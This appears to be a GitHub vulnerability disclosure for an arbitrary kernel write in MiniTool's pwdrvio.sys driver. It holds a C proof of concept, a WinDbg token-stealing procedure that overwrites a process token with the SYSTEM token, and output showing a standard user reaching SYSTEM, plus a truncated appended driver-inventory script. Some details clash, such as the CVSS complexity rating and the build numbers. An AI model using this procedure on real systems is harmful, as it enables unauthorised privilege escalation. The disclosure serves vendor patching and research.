canomer/CVE-2026-36981-Kernel-EoP-PoC

GitHub: canomer/CVE-2026-36981-Kernel-EoP-PoC

Proof of concept for the arbitrary write vulnerability (CVE-2026-36981) in the MiniTool pwdrvio.sys kernel driver, demonstrating the full path from discovery by fuzzing to debugger-assisted token stealing for local privilege escalation.

Stars: 1 | Forks: 0

# CVE-2026-36981-Kernel-EoP-PoC

A kernel arbitrary write condition exists in MiniTool's `pwdrvio.sys` kernel driver. This repository demonstrates a debugger-assisted arbitrary kernel write primitive that can be used to assist privilege escalation.

* 2026-02-09 Vendor notified
* 2026-03-05 Vendor acknowledged
* 2026-03-05 CVE requested from MITRE
* 2026-05-10 Public disclosure after the 90-day coordinated disclosure period

https://github.com/user-attachments/assets/ac81d7ce-0be7-40a5-9334-c54350e6e30e

**Arbitrary Kernel Write → Local Privilege Escalation (LPE)**

**Severity:** HIGH

**CVSS 3.1 Score:** 7.8 (LPE)

**CVSS Vector String:**

- LPE: `CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H`

- A debugger-assisted arbitrary kernel write primitive that can assist privilege escalation.
- Exploitable through the arbitrary write primitive at driver offset 0x1641
- Requires kernel debugging tools for stable exploitation
- Confirmed on Windows 10 Build 19045.6466

**Attack Prerequisites:**

- Local access to the target system
- A standard user account (non-administrator)
- MiniTool installed or uninstalled (with the pwdrvio.sys driver loaded)

**Exploitation Result:**

**LPE -** Demonstrated debugger-assisted privilege escalation (NT AUTHORITY\SYSTEM), leading to full system compromise

## Vulnerability Discovery Timeline

### Initial Fuzzing and BSOD Discovery

**Date:** February 5, 2026

**Activity:** Systematic kernel driver fuzzing with a custom Python fuzzer

**Discovery Process:**

1. **Target selection:**
   - Enumerated the kernel drivers installed on a Windows 10 VM
   - Identified `pwdrvio.sys` as the oldest driver (timestamp: June 16, 2009)
   - Driver file: `C:\Windows\System32\drivers\pwdrvio.sys`
   - Device object: `\\.\PartitionWizardDiskAccesser\0`

2. **Initial fuzzing:**
   - Developed a Python fuzzer that talks to the driver through `ctypes`
   - Sent randomized data to the driver device via `WriteFile`/`DeviceIoControl`
   - **Result:** multiple Blue Screens of Death (BSOD)

3. **Enabling Driver Verifier:**
   - Enabled Driver Verifier for better crash detection

   ```
   verifier /standard /driver pwdrvio.sys
   ```

   **Verifier configuration:**

   ```
   Verifier Flags: 0x001209bb
   Standard Flags:
   [X] Special pool
   [X] Force IRQL checking
   [X] Pool tracking
   [X] I/O verification
   [X] Deadlock detection
   [X] DMA checking
   [X] Security checks
   [X] Miscellaneous checks
   [X] DDI compliance checking
   ```

### WinDbg Kernel Debugging Setup

**Date:** February 5-6, 2026

**Activity:** Set up a kernel debugging environment for root cause analysis

**Setup Process:**

1. **VMware serial port configuration:**

   ```
   VMware Workstation Pro → VM Settings
   ├─ Add Hardware → Serial Port
   ├─ Connection: "Use named pipe"
   ├─ Path: \\.\pipe\com_1
   ├─ End: "This end is the server"
   └─ I/O mode: "Yield CPU on poll" ✓
   ```

2. **Guest OS configuration:**

   ```
   REM Administrator command prompt
   bcdedit /debug on
   bcdedit /dbgsettings serial debugport:1 baudrate:115200
   shutdown /r /t 0
   ```

3. **Host WinDbg connection:**

   ```
   WinDbg → File → Attach to Kernel
   ├─ Port: \\.\pipe\com_1
   ├─ Baud rate: 115200
   ├─ Pipe: ✓
   └─ Reconnect: ✓

   Result: "Kernel debugger connection established."
   ```

### Root Cause Analysis - Arbitrary Write Discovered

**Date:** February 6, 2026

**Activity:** Identified the arbitrary kernel write primitive

**Analysis Steps:**

1. **Module analysis:**

   ```
   1: kd> lm m pwdrvio
   start             end                 module name
   fffff805`315f0000 fffff805`315f8000   pwdrvio   (Jun 16 2009)

   1: kd> !drvobj pwdrvio 2
   Driver object (fffff805`XXXXXXXX) is for:
    \Driver\pwdrvio
   DriverEntry:   fffff805`315f6008
   DriverUnload:  fffff805`315f1060
   Dispatch Routines:
   [00] IRP_MJ_CREATE          fffff805`315f108c
   [02] IRP_MJ_CLOSE           fffff805`315f12f8
   [03] IRP_MJ_READ            fffff805`315f16c4
   [04] IRP_MJ_WRITE           fffff805`315f1564  ← Target
   [0e] IRP_MJ_DEVICE_CONTROL  fffff805`315f1404
   ```

2. **Vulnerable instruction discovered:**

   Breakpoint set on the write handler:

   ```
   1: kd> bp pwdrvio+0x1641
   1: kd> g
   Breakpoint 0 hit
   pwdrvio+0x1641:
   fffff805`315f1641 498943f0    mov qword ptr [r11-10h],rax
   ```

   **Key finding:** an arbitrary write primitive!
   - The instruction writes a kernel pointer (`RAX`) to the address `[R11-0x10]`
   - `R11` is loaded from the stack frame: `mov r11, qword ptr [rbp+0xB8h]`
   - No validation is performed on the target address

3. **Register state analysis:**

   ```
   0: kd> r
   rax=fffff805315f1364  ← kernel code pointer
   r11=ffffe60f84c38750  ← target address (controlled via the stack)
   rbp=ffffe60f84c38610  ← IRP stack frame

   0: kd> dq @rbp+0xB8 L1
   ffffe60f`84c386c8  ffffe60f`84c38750  ← R11 is loaded from here
   ```

### UAF to Arbitrary Write Analysis

**Date:** February 6-7, 2026

**Activity:** Traced the vulnerability from a use-after-free to the arbitrary write condition

**Memory Corruption Chain:**

1. **IRP allocation:**

   ```
   0: kd> !pool @rbp
   Pool page ffffe60f84c38610 region is Special pool
   *ffffe60f84c38000 size: 1f0 data: ffffe60f84c38e10 (NonPaged) *Irp+
       Pooltag Irp+ : I/O verifier allocated IRP packets
   ```

2. **Buffer relationship:**

   ```
   0: kd> r rsi
   rsi=ffffe60f828df900  ← user buffer location

   0: kd> ? @rbp - @rsi
   Evaluate expression: 35823344 = 00000000`02229ef0  ← 35 MB apart!
   ```

   **Analysis:** the user buffer cannot be reached directly from the RBP frame
   - RBP points to the IRP structure in the kernel pool
   - The user buffer lives in a different memory region
   - The `RBP+0xB8` offset does not point at a user-controlled buffer

3. **Use-after-free condition:**

   The driver keeps a dangling pointer in the IRP structure:

   ```
   // Ghidra decompilation (pwdrvio+0x1564)
   longlong lVar1 = *(longlong *)(param_2 + 0xb8);  // loaded from the IRP
   // No validation!
   lVar5 = IoBuildAsynchronousFsdRequest(...);
   // Write to [lVar1 - 0x10]
   *(code **)(lVar3 + -0x10) = FUN_00011364;  // arbitrary write!
   ```

### Local Privilege Escalation Development

**Date:** February 7-8, 2026

**Activity:** Developed the token stealing technique

**Exploitation Strategy:**

**Goal:** overwrite the current process token with the SYSTEM token

**Windows EPROCESS structure:**

```
+0x000 Pcb              : _KPROCESS
...
+0x4b8 Token            : _EX_FAST_REF  ← Token pointer location
```

**Token Stealing Process:**

1. **Locate the SYSTEM process:**

   ```
   0: kd> !process 4 0
   PROCESS ffffe7875ac86200
       SessionId: none  Cid: 0004    Peb: 00000000
       Image: System

   0: kd> dq ffffe7875ac86200+4b8 L1
   ffffe787`5ac866b8  ffffc08e`6642f04f  ← SYSTEM token value
   ```

2. **Locate the attacker process:**

   ```
   0: kd> !process 0 0 poc1.exe
   PROCESS ffffe78760150080
       SessionId: 1  Cid: 0678
       Image: poc1.exe

   0: kd> dq ffffe78760150080+4b8 L1
   ffffe787`60150538  ffffc08e`6c37a066  ← standard user token
   ```

3. **Compute the target address:**

   ```
   Target = TokenPointer + 0x10
          = 0xffffe78760150538 + 0x10
          = 0xffffe78760150548

   Reason: the instruction uses [R11-0x10], so:
   (Target + 0x10) - 0x10 = Target
   ```

4. **Perform the token overwrite:**

   ```
   0: kd> r rax = ffffc08e6642f04f    ; SYSTEM token
   0: kd> r r11 = ffffe78760150548    ; target address
   0: kd> p                           ; execute: mov [r11-10h],rax

   0: kd> dq ffffe78760150538 L1      ; verify
   ffffe787`60150538  ffffc08e`6642f04f  ← token successfully modified!
   ```

5. **Resume execution:**

   ```
   0: kd> r rip = pwdrvio + 165f      ; jump to a safe return
   0: kd> r eax = 0                   ; return success
   0: kd> bc *                        ; clear breakpoints
   0: kd> g                           ; continue
   ```

   **Result:** the process now runs with SYSTEM privileges!

## Vulnerability #1: Arbitrary Kernel Write Leading to LPE

### CWE Classification

- **CWE-787:** Out-of-bounds Write
- **CWE-123:** Write-what-where Condition
- **CWE-782:** Exposed IOCTL with Insufficient Access Control

### Vulnerability Details

**Location:** `pwdrvio.sys` offset 0x1641

**Assembly:**

```
pwdrvio+0x1633: mov r11, qword ptr [rbp+0xB8h]   ; Load pointer from IRP
pwdrvio+0x1641: mov qword ptr [r11-10h], rax     ; Arbitrary write!
```

**Trigger mechanism:**

```
HANDLE hDevice = CreateFileA("\\\\.\\PartitionWizardDiskAccesser\\0",
                             GENERIC_READ | GENERIC_WRITE, 0, NULL,
                             OPEN_EXISTING, 0, NULL);
char buffer[0x100];
DWORD bytesReturned;
WriteFile(hDevice, buffer, 0x100, &bytesReturned, NULL);
```

**Exploitation Limitations:**

This vulnerability requires kernel debugging tools for stable exploitation because:

1. **Register control challenge:**
   - The target register `R11` is loaded from `[RBP+0xB8]`
   - `RBP` points to the IRP stack frame in the kernel pool
   - The user buffer lives in a different memory region (more than 35 MB away)
   - `[RBP+0xB8]` cannot be controlled directly from the user buffer

2. **Pool memory layout:**

   ```
   RBP (IRP frame): 0xffffe60f84c38610
   User buffer:     0xffffe60f828df900
   Difference:      35,823,344 bytes (35 MB)
   ```

3. **Manual intervention required:**
   - Set the `R11` register to the target address through the debugger
   - Set the `RAX` register to the SYSTEM token value
   - Execute the instruction
   - Resume the execution flow

### CVSS 3.1 Score: 7.8 (HIGH)

**Metrics:**

- **Attack Vector (AV):** Local - requires local system access
- **Attack Complexity (AC):** Low - no special conditions required
- **Privileges Required (PR):** Low - a standard user is sufficient
- **User Interaction (UI):** None - no user interaction needed
- **Scope (S):** Unchanged - same security authority
- **Confidentiality (C):** High - full file system access
- **Integrity (I):** High - full system modification
- **Availability (A):** High - can crash or disable the system

### Full Code and Exploitation

**Code:**

```
#include <windows.h>
#include <stdio.h>

int main() {
    HANDLE hDevice;
    DWORD bytesReturned;
    char buffer[0x100];

    printf("[*] MiniTool PoC Trigger...\n");
    printf("[*] Current User: ");
    system("whoami");

    // 1. Connect to the driver
    hDevice = CreateFileA("\\\\.\\PartitionWizardDiskAccesser\\0",
                          GENERIC_READ | GENERIC_WRITE, 0, NULL,
                          OPEN_EXISTING, 0, NULL);
    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("[-] Cannot Open Driver! Error: %lu\n", GetLastError());
        return 1;
    }

    printf("[+] Connected. WinDbg - BP 1641.\n");
    printf("[!] WinDbg - Token Change - 'g'.\n");
    getchar();  // Wait here while the WinDbg breakpoint is handled

    // 2. Trigger the vulnerability (send random data to the driver)
    WriteFile(hDevice, buffer, 0x100, &bytesReturned, NULL);

    printf("[*] Completed. SYSTEM Shell Opening...\n");

    // 3. If the token was changed, this shell runs as SYSTEM
    system("whoami && cmd.exe");
    return 0;
}
```

**How to compile:**

* MinGW on Linux

```
┌──(PC㉿PC)-[/dir]
└─$ x86_64-w64-mingw32-gcc LPE_PoC.c -o LPE_PoC.exe -lntdll -static
```

**WinDbg Procedure:**

* When our breakpoint is hit

```
1: kd> bp pwdrvio+0x1641
1: kd> g
Breakpoint 0 hit
Unable to load image pwdrvio.sys, Win32 error 0n2
pwdrvio+0x1641:
fffff805`315f1641 498943f0        mov     qword ptr [r11-10h],rax
1: kd> !process 0 0 poc1.exe
PROCESS ffff9d8f6401f080
    SessionId: 1  Cid: 1948    Peb: 27a2a7000  ParentCid: 16ac
    DirBase: 1b2528000  ObjectTable: ffffc2093fb93140  HandleCount:  58.
    Image: poc1.exe

1: kd> dq ffff9d8f6401f080+4b8 L1
ffff9d8f`6401f538  ffffc209`40117738
1: kd> dq ffff9d8f6401f538 L1
ffff9d8f`6401f538  ffffc209`40117738
1: kd> !process 4 0
Searching for Process with Cid == 4
PROCESS ffff9d8f5f069040
    SessionId: none  Cid: 0004    Peb: 00000000  ParentCid: 0000
    DirBase: 001aa000  ObjectTable: ffffc2093447ac40  HandleCount: 2517.
    Image: System

1: kd> dq ffff9d8f5f069040+4b8 L1
ffff9d8f`5f0694f8  ffffc209`3441d8df
1: kd> r rax = ffffc2093441d8df
1: kd> r r11 = ffff9d8f6401f538 + 10
1: kd> p
pwdrvio+0x1645:
fffff805`315f1645 488d442440      lea     rax,[rsp+40h]
1: kd> dq ffff9d8f6401f538 L1
ffff9d8f`6401f538  ffffc209`3441d8df
1: kd> r rip = pwdrvio + 0x165f
1: kd> r eax = 0
1: kd> bc *
1: kd> g
```

**Terminal output:**

```
PS C:\Users\standarduser\directory> whoami # Standard User Identification
PC\standarduser
PS C:\Users\standarduser\directory> whoami /priv # Standard User Privs

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                        State
============================= ================================== ========
SeShutdownPrivilege           Sistemi kapat                      Disabled
SeChangeNotifyPrivilege       Çapraz geçiş denetimini atla       Enabled
SeUndockPrivilege             Bilgisayarı takma biriminden çıkar Disabled
SeIncreaseWorkingSetPrivilege İşlem çalışma kümesini artır       Disabled
SeTimeZonePrivilege           Saat dilimini değiştir             Disabled

PS C:\Users\standarduser\directory> whoami /groups # Standard User Groups

GROUP INFORMATION
-----------------

Group Name                                                Type             SID          Attributes
========================================================= ================ ============ ==================================================
Everyone                                                  Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Yerel hesap ve Administrators grubunun üyesi Well-known group S-1-5-114    Group used for deny only
BUILTIN\Administrators                                    Alias            S-1-5-32-544 Group used for deny only
BUILTIN\Users                                             Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE                                  Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group
KONSOL OTURUMU AÇMA                                       Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users                          Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization                            Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Yerel hesap                                  Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                                     Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication                          Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Zorunlu Etiket\Orta Zorunlu Düzey                         Label            S-1-16-8192

PS C:\Users\standarduser\directory>
PS C:\Users\standarduser\directory> .\poc1.exe # PoC Execution
[*] MiniTool PoC Tetikleyici Baslatiliyor...
[*] Mevcut Kullanici: desktop-usp1rvs\kali
[+] Surucu baglantisi basarili. WinDbg'da BP 1641 bekleyin.
[!] WinDbg'da Token'i degistirdikten sonra 'g' deyin.

[*] Islem tamamlandi. SYSTEM Shell acilmaya calisiliyor...
nt authority\system
Microsoft Windows [Version 10.0.19045.3803]
(c) Microsoft Corporation. Tüm hakları saklıdır.

C:\Users\standarduser\directory>whoami # Elevated User Identification
nt authority\system

C:\Users\standarduser\directory>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                                     State
========================================= =============================================================================== ========
SeCreateTokenPrivilege                    Belirteç nesnesi oluştur                                                        Disabled
SeAssignPrimaryTokenPrivilege             İşlem düzeyi belirtecini değiştir                                               Disabled
SeLockMemoryPrivilege                     Sayfaları bellekte kilitle                                                      Enabled
SeIncreaseQuotaPrivilege                  İşlem için bellek kotaları ayarla                                               Disabled
SeTcbPrivilege                            İşletim sisteminin parçası gibi davran                                          Enabled
SeSecurityPrivilege                       Denetimi ve güvenlik günlüğünü yönet                                            Disabled
SeTakeOwnershipPrivilege                  Dosyaların veya diğer nesnelerin sahipliğini al                                 Disabled
SeLoadDriverPrivilege                     Aygıt sürücüleri yükle ve kaldır                                                Disabled
SeSystemProfilePrivilege                  Sistem performansı profili oluştur                                              Enabled
SeSystemtimePrivilege                     Sistem saatini değiştir                                                         Disabled
SeProfileSingleProcessPrivilege           Tek işlem profili oluştur                                                       Enabled
SeIncreaseBasePriorityPrivilege           Zamanlama önceliğini artır                                                      Enabled
SeCreatePagefilePrivilege                 Disk belleği dosyası oluştur                                                    Enabled
SeCreatePermanentPrivilege                Kalıcı paylaşılan nesneler oluştur                                              Enabled
SeBackupPrivilege                         Dosya ve dizinleri yedekle                                                      Disabled
SeRestorePrivilege                        Dosya ve dizinleri geri yükle                                                   Disabled
SeShutdownPrivilege                       Sistemi kapat                                                                   Disabled
SeDebugPrivilege                          Programların hatalarını ayıkla                                                  Enabled
SeAuditPrivilege                          Güvenlik denetimleri oluştur                                                    Enabled
SeSystemEnvironmentPrivilege              Üretici yazılımı ortam değerlerini değiştir                                     Disabled
SeChangeNotifyPrivilege                   Çapraz geçiş denetimini atla                                                    Enabled
SeUndockPrivilege                         Bilgisayarı takma biriminden çıkar                                              Disabled
SeManageVolumePrivilege                   Birim bakım görevleri gerçekleştir                                              Disabled
SeImpersonatePrivilege                    Kimlik doğrulamasından sonra istemcinin özelliklerini al                        Enabled
SeCreateGlobalPrivilege                   Genel nesneler oluştur                                                          Enabled
SeTrustedCredManAccessPrivilege           Kimlik Bilgileri Yöneticisi'ne güvenilen arayan olarak eriş                     Disabled
SeRelabelPrivilege                        Nesne etiketini değiştir                                                        Disabled
SeIncreaseWorkingSetPrivilege             İşlem çalışma kümesini artır                                                    Enabled
SeTimeZonePrivilege                       Saat dilimini değiştir                                                          Enabled
SeCreateSymbolicLinkPrivilege             Simgesel bağlantılar oluştur                                                    Enabled
SeDelegateSessionUserImpersonatePrivilege Aynı oturumdaki farklı bir kullanıcı için bir kimliğe bürünme belirteci edinin. Enabled

C:\Users\standarduser\directory>whoami /groups

GROUP INFORMATION
-----------------

Group Name                           Type             SID          Attributes
==================================== ================ ============ ==================================================
BUILTIN\Administrators               Alias            S-1-5-32-544 Enabled by default, Enabled group, Group owner
Everyone                             Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
Zorunlu Etiket\Sistem Zorunlu Düzeyi Label            S-1-16-16384
```

## Proof of Concept and Reproduction Steps

### Prerequisites

**Test Environment:**
- **Operating System:** Windows 10 Home Build 19045.6466
- **Architecture:** x64
- **MiniTool Version:** Partition Wizard 13.5
- **Driver:** pwdrvio.sys (dated June 16, 2009)
- **User Account:** standard user (non-administrator)

**Required Tools:**
- **For LPE:** WinDbg (Windows Debugger), VMware Workstation

### Reproduction #2: Local Privilege Escalation (WinDbg-Assisted)

**Step 1: Set up the kernel debugging environment**

**A. VMware configuration**

1. Open the VM settings in VMware Workstation Pro
2. Add Hardware → Serial Port
3. Configure:
   - Connection: "Use named pipe"
   - Named pipe: `\\.\pipe\com_1`
   - This end: "This end is the server"
   - Other end: "The other end is an application"
   - I/O mode: ✓ Yield CPU on poll
4. Save and start the VM

**B. Guest OS configuration**

```
REM Administrator Command Prompt in VM
C:\> bcdedit /debug on
The operation completed successfully.

C:\> bcdedit /dbgsettings serial debugport:1 baudrate:115200
The operation completed successfully.

C:\> bcdedit /dbgsettings
debugtype               Serial
debugport               1
baudrate                115200

C:\> shutdown /r /t 0
```

**C. Host WinDbg setup**

1. Open WinDbg (x64)
2. File → Kernel Debug (Ctrl+K)
3. Configure:
   - Tab: COM
   - Port: `\\.\pipe\com_1`
   - Baud rate: 115200
   - ✓ Pipe
   - ✓ Reconnect
4. Click OK

Wait for the connection message:

```
Opened \\.\pipe\com_1
Waiting to reconnect...
Connected to Windows 10 19041 x64 target
Kernel Debugger connection established.
1: kd>
```

**Step 2: Compile the proof of concept**

Save as `lpe_poc.c`:

```
#include <windows.h>
#include <stdio.h>

int main() {
    HANDLE hDevice;
    DWORD bytesReturned;
    char buffer[0x100];

    printf("[*] MiniTool pwdrvio.sys LPE PoC\n");
    printf("[*] Current user: ");
    system("whoami");

    // Open driver
    hDevice = CreateFileA("\\\\.\\PartitionWizardDiskAccesser\\0",
                          GENERIC_READ | GENERIC_WRITE, 0, NULL,
                          OPEN_EXISTING, 0, NULL);
    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("[-] Failed to open driver (Error: %lu)\n", GetLastError());
        return 1;
    }

    printf("[+] Driver opened successfully\n");
    printf("[!] Waiting for WinDbg manipulation...\n");
    printf("[!] Set breakpoint: bp pwdrvio+0x1641\n");
    printf("[!] Press ENTER when ready...\n");
    getchar();  // Wait for WinDbg setup

    // Trigger vulnerability
    WriteFile(hDevice, buffer, 0x100, &bytesReturned, NULL);

    printf("[*] Exploitation complete\n");
    printf("[*] Spawning SYSTEM shell...\n");

    // If successful, this CMD will have SYSTEM privileges
    system("whoami && cmd.exe");

    CloseHandle(hDevice);
    return 0;
}
```

**Compile on Linux/WSL:**

```
x86_64-w64-mingw32-gcc lpe_poc.c -o lpe_poc.exe -lntdll -static
```

**Step 3: Run the exploit**

**A. Start the PoC in the VM (standard user)**

```
C:\> whoami
desktop-lfkkhu2\standard_user

C:\> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                        State
============================= ================================== ========
SeShutdownPrivilege           Shut down the system               Disabled
SeChangeNotifyPrivilege       Bypass traverse checking           Enabled
SeUndockPrivilege             Remove computer from docking       Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set     Disabled
SeTimeZonePrivilege           Change the time zone               Disabled

[Limited privileges - no SeDebugPrivilege]

C:\> lpe_poc.exe
[*] MiniTool pwdrvio.sys LPE PoC
[*] Current user: desktop-lfkkhu2\standard_user
[+] Driver opened successfully
[!] Waiting for WinDbg manipulation...
[!] Set breakpoint: bp pwdrvio+0x1641
[!] Press ENTER when ready...
[WAIT - Do not press ENTER yet]
```

**B. WinDbg setup and operation**

```
1: kd> bp pwdrvio+0x1641
1: kd> g
```

Now press ENTER in the PoC. WinDbg will break in:

```
Breakpoint 0 hit
pwdrvio+0x1641:
fffff802`18b11641 498943f0        mov     qword ptr [r11-10h],rax

0: kd> r
rax=fffff80218b11364 rbx=0000000000000000 rcx=ffffe78761218e20
rdx=ffffe7875ff72e10 rsi=ffffe7875dd48f20 rdi=0000000000000000
rip=fffff80218b11641 rsp=ffff9f801c707100 rbp=ffffe7875ff72e10
 r8=0000000000000001  r9=0000000000000000 r10=0000000000000000
r11=ffffe7875ff72f70 r12=0000000000000001 r13=ffffdf0a0c48ecd0
r14=0000000000000000 r15=ffffe78761218e20
```

**C. Locate the SYSTEM process and token**

```
0: kd> !process 4 0
Searching for Process with Cid == 4
PROCESS ffffe7875ac86200
    SessionId: none  Cid: 0004    Peb: 00000000  ParentCid: 0000
    DirBase: 001aa000  ObjectTable: ffffc08e66444c80  HandleCount: 2471
    Image: System

0: kd> dq ffffe7875ac86200+4b8 L1
ffffe787`5ac866b8  ffffc08e`6642f04f  ← SYSTEM token value
```

**D. Locate the attacker process**

```
0: kd> !process 0 0 lpe_poc.exe
PROCESS ffffe78760150080
    SessionId: 1  Cid: 0678    Peb: a520317000  ParentCid: 14b8
    DirBase: 402a29000  ObjectTable: ffffc08e6beb0780  HandleCount: 58
    Image: lpe_poc.exe

0: kd> dq ffffe78760150080+4b8 L1
ffffe787`60150538  ffffc08e`6c37a066  ← Current token (standard user)
```

**E. Perform the token overwrite**

```
0: kd> r rax = ffffc08e6642f04f
0: kd> r r11 = ffffe78760150538 + 10
0: kd> r r11
r11=ffffe78760150548
0: kd> p
pwdrvio+0x1645:
fffff802`18b11645 488d442440      lea     rax,[rsp+40h]

0: kd> dq ffffe78760150538 L1
ffffe787`60150538  ffffc08e`6642f04f  ← Token successfully changed!
```

**F. Resume execution**

```
0: kd> r rip = pwdrvio + 165f
0: kd> r eax = 0
0: kd> bc *
0: kd> g
```

**G. Verify the privilege escalation in the VM**

```
[*] Exploitation complete
[*] Spawning SYSTEM shell...
nt authority\system
Microsoft Windows [Version 10.0.19045.6466]

C:\> whoami
nt authority\system

C:\> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name                            Description                          State
========================================= ==================================== ========
SeCreateTokenPrivilege                    Create a token object                Disabled
SeAssignPrimaryTokenPrivilege             Replace a process level token        Disabled
SeLockMemoryPrivilege                     Lock pages in memory                 Enabled
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process   Disabled
SeTcbPrivilege                            Act as part of the operating system  Enabled
SeSecurityPrivilege                       Manage auditing and security log     Disabled
SeTakeOwnershipPrivilege                  Take ownership of files/objects      Disabled
SeLoadDriverPrivilege                     Load and unload device drivers       Disabled
SeSystemProfilePrivilege                  Profile system performance           Enabled
SeSystemtimePrivilege                     Change the system time               Disabled
SeProfileSingleProcessPrivilege           Profile single process               Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority         Enabled
SeCreatePagefilePrivilege                 Create a pagefile                    Enabled
SeCreatePermanentPrivilege                Create permanent shared objects      Enabled
SeBackupPrivilege                         Back up files and directories        Disabled
SeRestorePrivilege                        Restore files and directories        Disabled
SeShutdownPrivilege                       Shut down the system                 Disabled
SeDebugPrivilege                          Debug programs                       Enabled  ← SYSTEM!
SeAuditPrivilege                          Generate security audits             Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values   Disabled
SeChangeNotifyPrivilege                   Bypass traverse checking             Enabled
SeUndockPrivilege                         Remove computer from docking         Disabled
SeManageVolumePrivilege                   Perform volume maintenance tasks     Disabled
SeImpersonatePrivilege                    Impersonate a client after auth      Enabled
SeCreateGlobalPrivilege                   Create global objects                Enabled
SeTrustedCredManAccessPrivilege           Access Credential Manager as trusted Disabled
SeRelabelPrivilege                        Modify an object label               Disabled
SeIncreaseWorkingSetPrivilege             Increase a process working set       Enabled
SeTimeZonePrivilege                       Change the time zone                 Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                Enabled
SeDelegateSessionUserImpersonatePrivilege Impersonate other session users      Enabled

C:\> whoami /groups
GROUP INFORMATION
-----------------
Group Name                           Type             SID          Attributes
==================================== ================ ============ =======================================
BUILTIN\Administrators               Alias            S-1-5-32-544 Enabled by default, Enabled, Owner
Everyone                             Well-known group S-1-1-0      Mandatory, Enabled by default, Enabled
NT AUTHORITY\Authenticated Users     Well-known group S-1-5-11     Mandatory, Enabled by default, Enabled
Mandatory Label\System Mandatory Level Label          S-1-16-16384  ← SYSTEM integrity!
```

**MiniTool Software:**

```
Product: MiniTool Partition Wizard
Version: 13.5
Installation Path: C:\Program Files\MiniTool Partition Wizard
Driver Path: C:\Windows\System32\drivers\pwdrvio.sys
Driver Date: June 16, 2009 (0x4A36F8D1)
Driver Size: 32,256 bytes
```

**Testing Tools:**

```
WinDbg Version: 10.0.29507.1001 AMD64
Python Version: 3.x with ctypes
Compiler: x86_64-w64-mingw32-gcc (MinGW)
Verifier: Windows Driver Verifier (Standard flags)
```

## Affected Versions

### Confirmed Vulnerable

**Primary product:**
- MiniTool Partition Wizard 13.5
- All earlier versions that use pwdrvio.sys

**Driver details:**

```
File Name: pwdrvio.sys
File Version: [Not available]
File Size: 32,256 bytes (31.5 KB)
Time Stamp: 0x4A36F8D1 (June 16, 2009, 04:43:45 UTC)
Digital Signature: [Signed by vendor]
Device Name: \\.\PartitionWizardDiskAccesser\0
Service Name: pwdrvio
Load Order: Boot Start (SERVICE_BOOT_START)
```

### Potentially Affected

Other MiniTool products that may use the same driver:
- MiniTool Power Data Recovery
- MiniTool Partition Wizard Bootable Edition
- MiniTool ShadowMaker

**Note:** each product should be tested individually to confirm.

### Operating System Compatibility

**Tested and confirmed vulnerable:**
- Windows 10 Home Build 19045.6466 (x64)

**Reason:** the driver is compatible with all modern Windows versions and contains no version-specific checks.

## Legal Disclaimer

This repository is provided solely for educational purposes, defensive security research, and vulnerability reproduction in controlled lab environments.

The information and proof-of-concept code are intended to help defenders, researchers and vendors understand and fix the reported vulnerability.

Unauthorized or malicious use of this code against systems without explicit permission may violate applicable laws and regulations.

The author does not encourage or condone any illegal activity and accepts no responsibility for misuse or damage caused by the use of this material.

This vulnerability disclosure report may be used for:
1. Security research and education
2. Vendor notification and patch development
3. Protecting end users
4. Academic and defensive security purposes

**Strictly prohibited:**
- Unauthorized access to computer systems
- Malicious exploitation
- Any illegal activity

All testing was performed by the researcher on personally owned systems in a controlled environment. No unauthorized access to third-party systems was performed.

**Report Version:** 1.0
**Last Updated:** February 9, 2026
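The "Driver details" section above identifies the vulnerable driver by its 2009 PE link timestamp (0x4A36F8D1). The script below is an added example, not part of the original repository, showing the inventory check a defender runs to find such a driver on a fleet: it reads the COFF `TimeDateStamp` from a PE image and flags every `.sys` file in a directory older than a threshold. It uses only the Python standard library; `fake_pe` builds a constructed minimal PE header for offline testing (it is not the real driver), and `scan_drivers` takes whatever directory you point it at (on Windows, `C:\Windows\System32\drivers`). One caveat worth knowing: the hex stamp decodes to 01:43:45 UTC, so the 04:43:45 quoted above is the same value displayed in a UTC+3 local time.

```python
"""Flag stale kernel drivers by their PE link timestamp (added example)."""
import os
import struct
from datetime import datetime, timezone, timedelta

# Hex timestamp quoted in the advisory's "Driver details" section.
PWDRVIO_TIMESTAMP = 0x4A36F8D1


def pe_timestamp(data: bytes) -> datetime:
    """Return the COFF TimeDateStamp of a PE image as a UTC datetime.

    Layout: IMAGE_DOS_HEADER.e_lfanew at offset 0x3C points to the
    "PE\0\0" signature; the COFF file header follows immediately, and its
    TimeDateStamp field sits 8 bytes after the start of the signature.
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    (stamp,) = struct.unpack_from("<I", data, e_lfanew + 8)
    return datetime.fromtimestamp(stamp, tz=timezone.utc)


def is_stale(stamp: datetime, now: datetime, max_age_years: int = 10) -> bool:
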